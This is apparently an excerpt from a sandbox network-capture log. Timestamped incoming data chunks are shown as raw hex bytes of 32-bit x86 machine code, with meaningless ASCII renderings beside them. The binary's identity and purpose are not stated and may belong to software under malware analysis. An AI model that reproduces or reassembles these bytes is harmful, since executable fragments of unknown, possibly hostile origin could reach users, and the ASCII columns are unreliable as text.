2023-10-05 16:48:01 UTC	375	IN	Data Raw: 00 00 51 ff b7 94 01 00 00 ff 76 04 52 50 89 f3 89 ee ff 75 04 8b 6c 24 20 ff 75 04 ff b7 88 01 00 00 ff b7 5c 03 00 00 e8 64 91 ff ff 83 c4 24 55 e8 4b b1 fd ff 83 c4 04 56 e8 42 b1 fd ff 83 c4 04 53 e8 39 b1 fd ff 83 c4 04 ff b7 6c 01 00 00 e8 2b b1 fd ff 83 c4 04 c7 87 6c 01 00 00 00 00 00 00 8b 87 7c 03 00 00 8b 08 50 ff 51 24 83 c4 04 8b 87 18 01 00 00 85 c0 0f 84 8d 16 00 00 50 68 c7 13 4e 00 e8 36 a0 fd ff 83 c4 08 50 8b b4 24 70 01 00 00 ff 76 20 e8 63 69 fc ff 83 c4 08 c7 86 c0 fd ff ff 00 00 00 00 80 bf 5f 02 00 00 00 0f 85 bc 00 00 00 6a 2c ff 77 50 e8 af 8d fd ff 83 c4 08 84 c0 0f 84 a7 00 00 00 83 7f 60 05 74 0c 89 f9 ba 01 00 00 00 e8 02 1e 00 00 8b 8f 28 01 00 00 89 ca 80 e2 01 31 c0 f6 c1 08 0f b6 ca 0f 44 c1 80 bf 61 02 00 00 00 8b 57 50 Data Ascii: QvRPul$ u\d$UKVBS9l+l\|PQ$PhN6P$pv ci_j,wP`t(1DaWP
2023-10-05 16:48:01 UTC	383	IN	Data Raw: 24 01 00 00 83 78 08 00 0f 84 67 01 00 00 8b 40 04 8d 7c 24 20 8d 4c 24 0c 57 51 50 ff 50 1c 83 c4 0c 85 c0 0f 85 a1 01 00 00 89 5c 24 08 c7 44 24 18 00 00 00 00 c7 44 24 1c 00 00 00 00 c7 44 24 10 00 00 00 00 c7 44 24 14 00 00 00 00 8b 86 24 01 00 00 8b 4c 24 20 23 4c 24 24 31 d2 83 f9 ff 8d 9e 38 01 00 00 0f 44 d7 8b 48 04 8d 7c 24 18 89 5c 24 04 53 52 57 8d 54 24 1c 52 6a 00 ff 70 08 8d 5c 24 24 53 51 ff 51 14 83 c4 20 89 c7 83 7c 24 0c 00 74 11 8b 86 24 01 00 00 8b 40 04 53 50 ff 50 20 83 c4 08 83 ff 02 8b 44 24 08 0f 83 e8 00 00 00 83 7c 24 18 00 74 15 8b 86 24 01 00 00 8b 40 04 8d 4c 24 18 51 50 ff 50 18 83 c4 08 8b 86 28 01 00 00 8b 8e 38 01 00 00 89 c2 83 ca 01 89 96 28 01 00 00 83 f9 04 77 09 83 c8 09 89 86 28 01 00 00 6a 2d ff 76 50 e8 31 6e fd Data Ascii: $xg@\|$ L$WQPP\$D$D$D$D$$L$ #L$$18DH\|$\$SRWT$Rjp\$$SQQ \|$t$@SPP D$\|$t$@L$QPP(8(w(j-vP1n
2023-10-05 16:48:01 UTC	391	IN	Data Raw: ff 83 c4 08 85 c0 74 43 89 c6 8b 54 24 10 89 c1 83 c1 0c 57 ff 74 24 18 6a 00 6a 00 e8 50 fd ff ff 83 c4 10 89 c7 ff 76 08 ff 36 e8 01 38 00 00 83 c4 08 6a 20 56 e8 f6 37 00 00 83 c4 08 56 e8 cd 6c fd ff 83 c4 04 89 f8 eb 02 31 c0 5e 5f c3 cc 53 56 83 ec 08 8b 44 24 14 8b 0d 34 00 50 00 31 e1 89 4c 24 04 6a 00 50 e8 53 fc ff ff 83 c4 08 85 c0 74 45 89 c6 89 c1 83 c1 0c 89 e0 31 d2 50 6a 00 ff 74 24 20 6a 00 e8 e3 fc ff ff 83 c4 10 83 f8 01 0f 94 c3 ff 76 08 ff 36 e8 90 37 00 00 83 c4 08 6a 20 56 e8 85 37 00 00 83 c4 08 56 e8 5c 6c fd ff 83 c4 04 eb 02 31 db 8b 4c 24 04 31 e1 e8 3a bc 03 00 89 d8 83 c4 08 5e 5b c3 cc cc 55 53 57 56 83 ec 34 8b 74 24 48 a1 34 00 50 00 31 e0 89 44 24 30 c7 44 24 04 00 00 00 00 6a 21 ff 76 10 e8 68 67 fd ff 83 c4 08 8b 4e 10 Data Ascii: tCT$Wt$jjPv68j V7Vl1^_SVD$4P1L$jPStE1Pjt$ jv67j V7V\l1L$1:^[USWV4t$H4P1D$0D$j!vhgN
2023-10-05 16:48:01 UTC	399	IN	Data Raw: fd ff 83 c4 08 8b 4e 10 83 79 0c 00 75 20 be 02 00 00 00 52 50 6a 21 68 ef 13 4f 00 e8 70 4f fd ff 83 c4 10 84 c0 0f 85 39 02 00 00 8b 0f 6a 00 51 e8 ab 4c fd ff 83 c4 08 6a 1a ff 37 e8 df 48 fd ff 83 c4 08 8b 0f 83 79 0c 00 75 20 be 09 00 00 00 52 50 6a 1a 68 5a 80 4e 00 e8 31 4f fd ff 83 c4 10 84 c0 0f 85 fa 01 00 00 8b 0f 6a 00 51 e8 6c 4c fd ff 83 c4 08 6a 14 ff 37 e8 a0 48 fd ff 83 c4 08 8b 0f 83 79 0c 00 75 20 be 03 00 00 00 52 50 6a 14 68 bc e4 4e 00 e8 f2 4e fd ff 83 c4 10 84 c0 0f 85 bb 01 00 00 8b 0f 6a 00 51 e8 2d 4c fd ff 83 c4 08 6a 1e ff 37 e8 61 48 fd ff 83 c4 08 8b 0f 83 79 0c 00 75 20 be 06 00 00 00 52 50 6a 1e 68 3b 80 4e 00 e8 b3 4e fd ff 83 c4 10 84 c0 0f 85 7c 01 00 00 8b 0f 6a 00 51 e8 ee 4b fd ff 83 c4 08 6a 0b ff 37 e8 22 48 fd ff Data Ascii: Nyu RPj!hOpO9jQLj7Hyu RPjhZN1OjQlLj7Hyu RPjhNNjQ-Lj7aHyu RPjh;NN\|jQKj7"H
2023-10-05 16:48:01 UTC	407	IN	Data Raw: 15 8d 7c 24 0c 6a 00 6a 00 6a 01 6a 00 ff 15 4c d9 4f 00 89 04 24 8d 45 24 89 44 24 08 8d 45 04 89 44 24 04 8b 35 f8 d9 4f 00 eb 4f 90 90 90 90 90 89 5d 28 89 cb 68 e0 33 50 00 ff 15 80 d9 4f 00 c7 45 04 d8 33 50 00 a1 dc 33 50 00 89 45 08 8b 4c 24 04 89 08 8b 45 04 89 48 04 ff 35 60 00 50 00 ff 15 0c db 4f 00 68 e0 33 50 00 ff 15 a4 da 4f 00 84 db 0f 84 dd 00 00 00 6a ff ff 75 0c ff 15 44 db 4f 00 80 7d 11 00 0f 85 8b 00 00 00 85 ff 74 21 c7 47 0c 00 00 00 00 c7 47 08 00 00 00 00 c7 47 04 00 00 00 00 c7 07 00 00 00 00 8b 04 24 89 47 10 57 ff 74 24 0c ff 75 20 ff 75 1c ff 75 00 ff 15 54 db 4f 00 b1 01 31 db 85 c0 0f 85 5c ff ff ff 89 f3 ff d6 89 45 28 85 ff 74 34 ff d3 31 db 3d e5 03 00 00 0f 85 47 ff ff ff 6a 01 ff 74 24 0c 57 ff 75 00 ff 15 1c da 4f 00 Data Ascii: \|$jjjjLO$E$D$ED$5OO](h3POE3P3PEL$EH5`POh3POjuDO}t!GGG$GWt$u uuTO1\E(t41=Gjt$WuO
2023-10-05 16:48:01 UTC	414	IN	Data Raw: 4d 0f fd ff 83 c4 04 56 e8 44 0f fd ff 83 c4 04 31 c0 5e 5f 5b 5d c3 8b 44 24 28 ff 30 e8 2f 0f fd ff 83 c4 04 8b 44 24 28 89 18 8b 44 24 24 89 28 56 e8 1a 0f fd ff 83 c4 04 57 e8 81 6f 02 00 83 c4 04 b8 01 00 00 00 eb c8 8b 44 24 28 ff 30 e8 fc 0e fd ff 83 c4 04 8b 44 24 28 89 18 8b 44 24 24 89 28 56 e8 e7 0e fd ff 83 c4 04 57 ff 15 ec da 4f 00 57 ff 15 40 d9 4f 00 b8 02 00 00 00 eb 90 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 64 8b 9c 24 8c 00 00 00 8b bc 24 88 00 00 00 8b ac 24 84 00 00 00 a1 34 00 50 00 31 e0 89 44 24 60 8b 04 ad e4 84 4d 00 89 44 24 18 50 e8 f8 94 04 00 83 c4 04 8d 48 03 83 e1 fc 83 fd 01 89 44 24 0c 75 0a 89 de 89 3c 24 e9 ba 00 00 00 8d 54 24 20 89 14 24 31 f6 83 fd 02 0f 85 a8 00 00 00 83 fb 10 0f 85 9f 00 00 Data Ascii: MVD1^_[]D$(0/D$(D$$(VWoD$(0D$(D$$(VWOW@OUSWVd$$$4P1D$`MD$PHD$u<$T$ $1
2023-10-05 16:48:01 UTC	422	IN	Data Raw: ff 83 c4 20 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 0c 8b 6c 24 24 8b 5d 00 85 db 74 22 31 d2 b9 ff ff ff ff 8b 75 04 83 fb 01 75 22 b8 ff ff ff ff f6 c3 01 0f 85 8d 00 00 00 e9 9c 00 00 00 b9 ff ff ff ff b8 e1 ff ff ff e9 93 00 00 00 89 5c 24 04 83 e3 fe 89 5c 24 08 b8 ff ff ff ff 31 ed 89 34 24 90 90 90 90 90 90 90 90 8b 3c ae 89 fe d1 ee 89 fb 83 e3 01 09 f3 0f 45 cf be 00 00 00 00 0f 45 d6 8b 34 24 8b 74 ae 04 89 c7 0f 45 fd 89 f0 d1 e8 89 f3 83 e3 01 09 c3 0f 45 ce 8b 34 24 8d 45 01 0f 44 c7 bf 00 00 00 00 0f 45 d7 83 c5 02 3b 6c 24 08 75 b3 89 ea 8b 6c 24 24 8b 5c 24 04 f6 c3 01 74 14 8b 34 96 89 f7 d1 ef 89 f3 83 e3 01 09 fb 0f 45 c2 0f 45 ce c1 e0 05 83 c8 01 8b 7c 24 20 89 ce c1 ee 10 31 d2 81 f9 00 00 01 00 0f 93 c2 0f 42 f1 c1 Data Ascii: ^_[]USWVl$$]t"1uu"\$\$14$<EE4$tEE4$EDE;l$ul$$\$t4EE\|$ 1B
2023-10-05 16:48:01 UTC	430	IN	Data Raw: 10 8d 34 88 83 c6 04 31 c0 b9 01 00 00 00 8b 5c 24 18 eb 18 90 90 90 90 90 90 90 90 90 90 90 90 90 88 d1 83 c0 02 89 ea 39 c5 74 35 8b 7c 86 fc f7 d7 31 d2 01 cf 0f 92 c1 85 db 74 04 89 7c 86 fc 88 ca 8b 3c 86 f7 d7 31 c9 01 d7 0f 92 c2 85 db 74 ce 89 3c 86 eb c9 90 90 90 90 90 90 90 90 90 8b 7c 24 34 8b 74 24 0c f6 44 24 04 01 74 0e 85 db 74 0a 8b 14 86 f7 d2 01 d1 89 0c 86 8b 6c 24 28 8b 74 24 4c 39 ee 73 19 68 bb 02 00 00 68 f4 33 4f 00 68 24 17 4f 00 e8 e6 17 04 00 83 c4 0c 89 f5 8b 44 24 24 8b 4c 24 08 8d 34 81 89 6c 24 50 89 74 24 54 8d 4c 24 50 8d 54 24 70 53 57 8d 44 24 60 50 e8 37 ee ff ff 83 c4 0c 8b 54 24 14 39 ea 89 eb 73 31 b8 ff ff ff ff 8b 0c 24 d3 e0 f7 d0 21 04 96 8d 42 01 39 d8 73 1b 8d 04 96 83 c0 04 89 d1 f7 d1 01 d9 c1 e1 02 51 6a 00 Data Ascii: 41\$9t5\|1t\|<1t<\|$4t$D$ttl$(t$L9shh3Oh$OD$$L$4l$Pt$TL$PT$pSWD$`P7T$9s1$!B9sQj
2023-10-05 16:48:01 UTC	438	IN	Data Raw: 4c 24 0c 8b 49 04 8b 0c 81 31 d2 39 07 76 d2 8b 57 04 8b 14 82 eb ca 8b 4c 24 2c 85 c9 8b 7c 24 08 74 42 8b 01 8b 54 24 08 8b 3a 39 f8 0f 42 f8 8d 34 bd 00 00 00 00 56 8b 44 24 0c ff 70 04 ff 71 04 89 cd e8 18 29 03 00 83 c4 0c 8b 45 00 29 f8 8b 7c 24 08 c1 e0 02 03 75 04 50 56 e8 4f 7c ff ff 83 c4 08 8b 4c 24 30 85 c9 74 3e 8b 01 8b 54 24 0c 8b 3a 39 f8 0f 42 f8 8d 34 bd 00 00 00 00 56 ff 72 04 ff 71 04 89 cd e8 d2 28 03 00 83 c4 0c 8b 45 00 29 f8 8b 7c 24 08 c1 e0 02 03 75 04 50 56 e8 09 7c ff ff 83 c4 08 8b 03 c1 e0 02 50 ff 73 04 e8 f8 7b ff ff 83 c4 08 6a 08 53 e8 ed 7b ff ff 83 c4 08 53 e8 c4 b0 fc ff 83 c4 04 8b 34 24 8b 06 c1 e0 02 50 ff 76 04 e8 d0 7b ff ff 83 c4 08 6a 08 56 e8 c5 7b ff ff 83 c4 08 56 e8 9c b0 fc ff 83 c4 04 8b 07 c1 e0 02 50 ff Data Ascii: L$I19vWL$,\|$tBT$:9B4VD$pq)E)\|$uPVO\|L$0t>T$:9B4Vrq(E)\|$uPV\|Ps{jS{S4$Pv{jV{VP
2023-10-05 16:48:01 UTC	446	IN	Data Raw: 90 8b 74 85 04 31 d6 21 fe 31 d6 89 74 85 04 83 c1 01 3b 4c 24 3c 8b 34 24 0f 84 f2 00 00 00 89 c8 b9 00 00 00 00 39 c6 76 08 8b 4c 24 14 8b 4c 81 fc 8b 54 85 00 31 ca 21 fa 31 ca 89 54 85 00 8d 48 01 31 d2 39 ce 76 b8 8b 54 24 14 8b 14 82 eb af 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 8b 16 83 fa 03 bb 02 00 00 00 0f 43 da 89 5c 24 0c 83 e3 fe 31 c9 31 f6 eb 0f 90 90 90 90 90 90 09 e9 83 c6 01 39 de 74 37 89 f7 be 00 00 00 00 39 fa 76 0a 8b 74 24 74 8b 76 04 8b 34 be 09 f1 8d 77 01 31 ed 39 f2 76 d7 8b 6c 24 74 8b 6d 04 8b 6c bd 04 eb ca 90 90 90 90 90 90 90 90 90 90 f6 44 24 0c 01 74 16 8d 5f 02 31 f6 39 da 76 0b 8b 54 24 74 8b 52 04 8b 74 ba 08 09 f1 8b 5c 24 08 8b 6c 24 18 85 c0 0f 94 c0 89 ca d1 ea 83 e1 01 09 d1 0f 94 c1 08 c1 0f b6 c1 8b 4c 24 Data Ascii: t1!1t;L$<4$9vL$LT1!1TH19vT$C\$119t79vt$tv4w19vl$tmlD$t_19vT$tRt\$l$L$
2023-10-05 16:48:01 UTC	453	IN	Data Raw: b7 03 00 83 c4 08 85 c0 0f 84 67 02 00 00 8b 03 68 e6 3c 4e 00 ff 30 e8 5a b7 03 00 83 c4 08 85 c0 0f 84 07 03 00 00 8b 03 68 0d 32 4e 00 ff 30 e8 41 b7 03 00 83 c4 08 85 c0 0f 84 6e 03 00 00 8b 46 0c 68 71 1c 4e 00 ff 30 e8 27 b7 03 00 83 c4 08 89 c3 89 f1 ba 3d 00 00 00 e8 e1 09 00 00 85 db 0f 84 ee 03 00 00 84 c0 8b 34 24 8b 5c 24 04 0f 84 2f 04 00 00 89 f1 e8 53 0a 00 00 84 c0 0f 85 fd 00 00 00 89 f1 e8 f4 08 00 00 84 c0 0f 85 ee 00 00 00 e9 0c 04 00 00 8b 6e 08 8b 46 14 8b 55 08 39 d0 73 28 8b 75 00 0f b6 0c 06 80 c1 f7 0f b6 d9 80 f9 17 77 16 b9 03 00 80 00 0f a3 d9 73 0c 83 c0 01 39 c2 75 e0 e9 f4 03 00 00 39 d0 0f 84 ec 03 00 00 8b 4d 00 80 3c 01 3d 0f 85 df 03 00 00 83 c0 01 8b 0c 24 89 41 14 e8 df 09 00 00 84 c0 0f 84 c9 03 00 00 8b 5c 24 04 8b Data Ascii: gh<N0Zh2N0AnFhqN0'=4$\$/SnFU9s(uws9u9M<=$A\$
2023-10-05 16:48:01 UTC	461	IN	Data Raw: 08 eb de 6a 5d 68 60 53 4f 00 68 8e 67 4f 00 e8 70 9b 03 00 83 c4 0c c7 06 02 00 00 00 c7 46 08 10 00 00 00 6a 00 6a 01 6a 10 e8 12 53 fc ff 83 c4 0c 89 46 04 6a 00 6a 01 6a 08 e8 01 53 fc ff 83 c4 0c 89 46 14 c7 00 00 00 00 00 c7 40 04 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 6a 0f ff 76 04 e8 b6 4b fb ff 83 c4 08 8b 46 04 0f b6 48 08 88 48 0f 8b 46 04 c6 40 08 00 8b 46 04 8b 4e 14 8b 10 8b 40 04 89 41 04 89 11 8b 46 04 83 c0 09 6a 08 ff 76 14 50 e8 f1 b9 01 00 83 c4 0c 56 53 e8 d7 64 fc ff 83 c4 08 39 f0 75 b0 68 f0 40 47 00 e8 26 64 fc ff 83 c4 04 89 c7 89 7e 18 8b 06 ff 34 85 e4 84 4d 00 e8 b0 a9 fc ff 83 c4 04 89 46 0c 8b 46 08 01 c0 83 c0 01 6a 00 6a 01 50 e8 58 52 fc ff 83 c4 0c 89 46 10 83 7e 08 00 7e 52 8b 4e 04 0f b6 09 51 68 ea de Data Ascii: j]h`SOhgOpFjjjSFjjjSF@jvKFHHF@FN@AFjvPVSd9uh@G&d~4MFFjjPXRF~~RNQh
2023-10-05 16:48:01 UTC	469	IN	Data Raw: ad 2c fc ff 83 c4 08 6a 00 53 e8 e2 2c fc ff 83 c4 08 8b 47 e4 8b 08 ff 76 08 ff 76 04 50 ff 51 08 83 c4 0c 56 e8 57 3a fc ff 83 c4 04 8b 47 e4 8b 08 50 ff 51 04 83 c4 04 ff 77 f0 e8 50 34 fc ff 83 c4 04 8b 47 f8 85 c0 74 09 50 e8 30 3a fc ff 83 c4 04 ff 34 24 e8 35 34 fc ff 83 c4 04 8b 4c 24 24 31 e1 e8 17 84 02 00 83 c4 28 5e 5f 5b 5d c3 68 f5 00 00 00 68 de 52 4f 00 68 54 8d 4f 00 e8 be 7b 03 00 83 c4 0c e8 b3 0a f9 ff cc cc cc 8b 44 24 04 8b 40 dc 85 c0 74 0d 8b 08 ff 74 24 08 50 ff 51 0c 83 c4 08 c3 cc cc cc cc cc cc cc 56 8b 74 24 08 81 3e 78 52 4d 00 74 17 68 81 02 00 00 68 de 52 4f 00 68 06 19 4f 00 e8 72 7b 03 00 83 c4 0c 8b 46 e0 8b 08 50 ff 51 04 83 c4 04 ff 76 ec e8 a8 33 fc ff 83 c4 04 8b 46 f4 85 c0 74 09 50 e8 88 39 fc ff 83 c4 04 83 c6 d8 Data Ascii: ,jS,GvvPQVW:GPQwP4GtP0:4$54L$$1(^_[]hhROhTO{D$@tt$PQVt$>xRMthhROhOr{FPQv3FtP9
2023-10-05 16:48:01 UTC	477	IN	Data Raw: bd e9 fa ff 83 c4 08 56 68 01 7a 4e 00 e8 6f 0a fc ff 83 c4 08 89 c6 bf 49 fd 4e 00 b8 dc 14 4f 00 80 7c 24 20 00 0f 44 f8 85 db 89 d9 bb e4 01 4f 00 0f 44 d8 8b 55 d4 89 14 24 bd e2 01 4f 00 0f 44 e8 51 e8 98 d8 fe ff 83 c4 04 55 ff 74 24 28 50 53 57 56 68 14 05 4e 00 e8 22 0a fc ff 83 c4 1c 50 8b 44 24 04 ff 70 20 e8 52 d3 fa ff 83 c4 08 56 e8 d9 14 fc ff 83 c4 04 b0 01 83 c4 04 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 8a 5c 24 18 8b 6c 24 14 81 7d 00 f8 52 4d 00 74 17 68 db 00 00 00 68 40 44 4f 00 68 7e 18 4f 00 e8 4a 5c 03 00 83 c4 0c 8d 75 cc 8b 7d d4 80 7d e1 00 74 30 c6 46 15 00 84 db 74 3d 68 a9 74 4e 00 e8 a6 09 fc ff 83 c4 04 50 ff 77 20 e8 da d2 fa ff 83 c4 08 8b 46 0c 8b 48 04 50 ff 51 54 83 c4 04 eb 66 80 7e 16 00 74 16 Data Ascii: VhzNoINO\|$ DODU$ODQUt$(PSWVhN"PD$p RV^_[]USWV\$l$}RMthh@DOh~OJ\u}}t0Ft=htNPw FHPQTf~t
2023-10-05 16:48:01 UTC	485	IN	Data Raw: 00 00 8b 8b f0 7f ff ff 0f b7 d1 89 93 98 7e ff ff 83 c0 f0 89 83 f4 7f ff ff c1 e9 10 89 8b f0 7f ff ff c7 83 70 7e ff ff 0b 00 00 00 8b 3c 24 e9 ac fa ff ff 83 f8 10 0f 8c 66 03 00 00 8b 8b 98 7e ff ff 8b 93 f0 7f ff ff 89 d6 f7 d6 83 c0 f0 89 83 f4 7f ff ff c1 ea 10 89 93 f0 7f ff ff 0f b7 c6 39 c1 0f 85 61 03 00 00 85 c9 74 12 c7 83 70 7e ff ff 0c 00 00 00 8b 3c 24 e9 60 fa ff ff c7 83 70 7e ff ff 01 00 00 00 8b 3c 24 e9 4e fa ff ff 83 f8 08 0f 8c 08 03 00 00 0f b6 83 f0 7f ff ff 8b 4b f8 88 84 0b f8 7f ff ff 8b 4b f8 8b 53 fc 83 c1 01 81 e1 ff 7f 00 00 89 4b f8 83 c2 0c 50 52 e8 f8 ec fb ff 83 c4 08 83 83 f4 7f ff ff f8 c1 ab f0 7f ff ff 08 83 83 98 7e ff ff ff 8b 3c 24 0f 85 f7 f9 ff ff c7 83 70 7e ff ff 01 00 00 00 e9 e8 f9 ff ff 8b 4c 24 1c e8 bf Data Ascii: ~p~<$f~9atp~<$`p~<$NKKSKPR~<$p~L$
2023-10-05 16:48:01 UTC	493	IN	Data Raw: 0c ff 77 08 68 ae f3 4d 00 56 e8 12 5d 01 00 83 c4 0c ff 77 0c 68 a7 e9 4d 00 56 e8 01 5d 01 00 83 c4 0c 8b 47 10 85 c0 74 42 50 68 96 e9 4d 00 56 e8 eb 5c 01 00 83 c4 0c ff 77 14 68 fb 1c 4e 00 56 e8 da 5c 01 00 83 c4 0c ff 77 18 68 75 1b 4e 00 56 e8 c9 5c 01 00 83 c4 0c ff 77 1c 68 05 1d 4e 00 56 e8 b8 5c 01 00 83 c4 0c 89 f0 5e 5f c3 55 53 57 56 83 ec 14 8b 74 24 30 8b 7c 24 2c 8b 46 04 8d 4f 04 39 c8 0f 8c 62 01 00 00 89 4c 24 08 8b 6c 24 28 89 44 24 0c 01 e8 29 f8 57 55 50 e8 fb 4d 02 00 83 c4 0c 66 c7 45 00 00 02 8b 46 04 29 f8 8d 1c c5 68 00 00 00 8d 04 c5 70 00 00 00 50 e8 a9 d1 fe ff 83 c4 04 89 c6 68 a0 8b 42 00 89 5c 24 04 53 e8 25 45 ff ff 83 c4 08 89 c3 50 56 e8 a9 d2 fe ff 83 c4 08 53 8b 5c 24 34 e8 ec d2 fe ff 83 c4 04 f7 d7 8b 43 04 89 7c Data Ascii: whMV]whMV]GtBPhMV\whNV\whuNV\whNV\^_USWVt$0\|$,FO9bL$l$(D$)WUPMfEF)hpPhB\$S%EPVS\$4C\|
2023-10-05 16:48:01 UTC	500	IN	Data Raw: c6 08 83 c7 07 90 90 90 90 90 90 90 90 90 90 90 90 8b 6f f9 8b 57 fd 0f cd 31 cd 0f ca 31 c2 89 e8 c1 e8 04 31 d0 25 0f 0f 0f 0f 89 c1 c1 e1 04 31 e9 31 d0 89 cb c1 eb 10 0f b7 d0 31 da 89 d5 c1 e5 10 31 cd 31 c2 89 d1 c1 e9 02 31 e9 81 e1 33 33 33 33 8d 1c 8d 00 00 00 00 31 d3 31 e9 89 d8 c1 e8 08 31 c8 25 ff 00 ff 00 89 c5 c1 e5 08 31 dd 31 c8 89 c2 d1 ea 31 ea 81 e2 55 55 55 55 8d 0c 12 31 c1 31 ea 0f ac c1 01 d1 ca 6a 01 6a 00 ff 74 24 10 e8 97 0b 00 00 83 c4 0c 89 c1 6a ff 6a 0f ff 74 24 0c e8 85 0b 00 00 83 c4 0c 89 c1 6a 01 6a 00 ff 74 24 08 e8 73 0b 00 00 83 c4 0c d1 c0 d1 c2 89 c1 d1 e9 31 d1 81 e1 55 55 55 55 8d 2c 09 31 c5 31 d1 89 c8 c1 e8 08 31 e8 25 ff 00 ff 00 89 c2 c1 e2 08 31 ca 31 e8 89 d1 c1 e9 02 31 c1 81 e1 33 33 33 33 8d 2c 8d 00 00 Data Ascii: oW111%1111113333111%111UUUU11jjt$jjt$jjt$s1UUUU,111%1113333,
2023-10-05 16:48:01 UTC	508	IN	Data Raw: 00 08 00 00 0f b6 c8 03 9c 8f 00 0c 00 00 31 d3 33 9f 40 10 00 00 89 d9 c1 e9 18 89 da c1 ea 0e 81 e2 fc 03 00 00 8b 94 17 00 04 00 00 03 14 8f 0f b6 cf 33 94 8f 00 08 00 00 0f b6 cb 03 94 8f 00 0c 00 00 31 c2 33 97 3c 10 00 00 89 d0 c1 e8 18 89 d1 c1 e9 0e 81 e1 fc 03 00 00 8b 8c 0f 00 04 00 00 03 0c 87 0f b6 c6 33 8c 87 00 08 00 00 0f b6 c2 03 8c 87 00 0c 00 00 31 d9 33 8f 38 10 00 00 89 c8 c1 e8 18 89 ce c1 ee 0e 81 e6 fc 03 00 00 8b 9c 37 00 04 00 00 03 1c 87 0f b6 c5 33 9c 87 00 08 00 00 0f b6 c1 03 9c 87 00 0c 00 00 31 d3 33 9f 34 10 00 00 89 d8 c1 e8 18 89 da c1 ea 0e 81 e2 fc 03 00 00 8b 94 17 00 04 00 00 03 14 87 0f b6 c7 33 94 87 00 08 00 00 0f b6 c3 03 94 87 00 0c 00 00 31 ca 33 97 30 10 00 00 89 d0 c1 e8 18 89 d1 c1 e9 0e 81 e1 fc 03 00 00 8b Data Ascii: 13@313<3138731343130
2023-10-05 16:48:01 UTC	516	IN	Data Raw: c4 04 c7 85 e8 01 00 00 00 00 00 00 ff b5 64 01 00 00 e8 ea 7e fb ff 83 c4 04 c7 85 64 01 00 00 00 00 00 00 ff b5 68 01 00 00 e8 d2 7e fb ff 83 c4 04 c7 85 68 01 00 00 00 00 00 00 55 e8 8f be fd ff 83 c4 04 8b 45 68 8b 48 08 83 c1 fd 83 f9 01 0f 87 c0 00 00 00 8d b5 d8 02 00 00 c7 85 d8 02 00 00 00 00 00 00 c7 85 dc 02 00 00 00 00 00 00 8d 8d ec 01 00 00 89 4c 24 20 8b 40 0c 8b 40 14 89 44 24 1c 8b 85 24 01 00 00 8d 8d f4 02 00 00 8b 50 04 8d 7c 24 1c 51 57 ff 70 0c 52 ff 52 28 83 c4 10 89 85 f0 02 00 00 85 c0 74 26 8b 85 24 01 00 00 8b 48 04 56 ff 70 0c 51 ff 51 30 83 c4 0c 85 c0 0f 84 c1 02 00 00 68 78 68 4e 00 e9 48 fb ff ff c6 85 40 01 00 00 01 80 bd 61 02 00 00 00 74 14 8b 85 24 01 00 00 8b 48 04 83 c0 0c 50 51 ff 51 20 83 c4 08 68 e1 07 4f 00 e8 3f Data Ascii: d~dh~hUEhHL$ @@D$$P\|$QWpRR(t&$HVpQQ0hxhNH@at$HPQQ hO?
2023-10-05 16:48:01 UTC	524	IN	Data Raw: 50 56 e8 7a 5e fe ff 83 c4 08 89 c7 8b 45 10 8d 04 c5 ff ff ff ff 6a 00 50 56 e8 f2 5e fe ff 83 c4 0c ff 75 14 56 e8 96 73 fe ff 83 c4 08 31 db 85 c0 75 0f 57 56 ff 75 18 e8 b3 fc 00 00 83 c4 0c 89 c3 56 e8 98 56 fe ff 83 c4 04 89 d8 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 57 56 83 ec 0c 89 ce 8a 5c 24 20 8b 7c 24 1c a1 34 00 50 00 31 e0 89 44 24 08 89 e0 8d 4c 24 04 50 51 52 e8 27 05 01 00 83 c4 0c 83 7f 10 01 77 17 68 41 02 00 00 68 78 49 4f 00 68 1c 71 4f 00 e8 dd a0 02 00 83 c4 0c 84 db 75 0e ff 77 10 ff 76 08 e8 78 51 fb ff 83 c4 08 31 c0 83 7f 10 01 74 36 31 db 90 90 90 90 90 90 90 90 90 90 90 53 ff 74 24 04 e8 b6 56 fe ff 83 c4 08 0f b6 c0 50 ff 76 08 e8 97 50 fb ff 83 c4 08 83 c3 01 8b 47 10 83 c0 ff 39 c3 72 d7 50 ff 74 24 04 Data Ascii: PVz^EjPV^uVs1uWVuVV^_[]SWV\$ \|$4P1D$L$PQR'whAhxIOhqOuwvxQ1t61St$VPvPG9rPt$
2023-10-05 16:48:01 UTC	532	IN	Data Raw: 90 0f b7 1c 51 89 1c 97 83 c2 01 39 d0 75 f2 8b 4c 24 2c 83 f9 02 0f 82 5c 01 00 00 89 ca 8b 04 24 89 6c 24 0c eb 5d 90 90 90 90 90 90 90 90 90 90 6a 00 6a 01 ff 76 08 6a 04 55 ff 76 10 e8 5e 3a fb ff 83 c4 18 89 46 10 8b 4e 08 8d 51 01 89 56 08 c7 04 88 00 00 00 00 8b 46 04 83 c0 01 31 d2 f7 36 89 56 04 8b 4c 24 08 8b 44 24 04 8b 04 98 89 04 8f 83 c1 01 89 ca 89 f8 83 f9 01 0f 86 f7 00 00 00 8b 7c 24 04 89 44 24 04 31 db 31 c9 89 3c 24 89 54 24 10 eb 26 90 90 90 90 90 90 90 90 89 f8 8b 6c 24 0c 8b 3c 24 8b 4c 24 08 89 04 8f 83 c1 01 83 c3 02 8b 54 24 10 39 d3 73 b8 89 d8 83 c8 01 39 d0 89 4c 24 08 0f 84 61 ff ff ff 89 e9 8b 54 24 04 8b 2c 9a 8b 3c 82 0f af fd 83 c5 02 6a 00 6a 01 ff 76 08 6a 04 51 ff 76 10 e8 ad 39 fb ff 83 c4 18 89 46 10 0f b7 cd 8b 56 Data Ascii: Q9uL$,\$l$]jjvjUv^:FNQVF16VL$D$\|$D$11<$T$&l$<$L$T$9s9L$aT$,<jjvjQv9FV
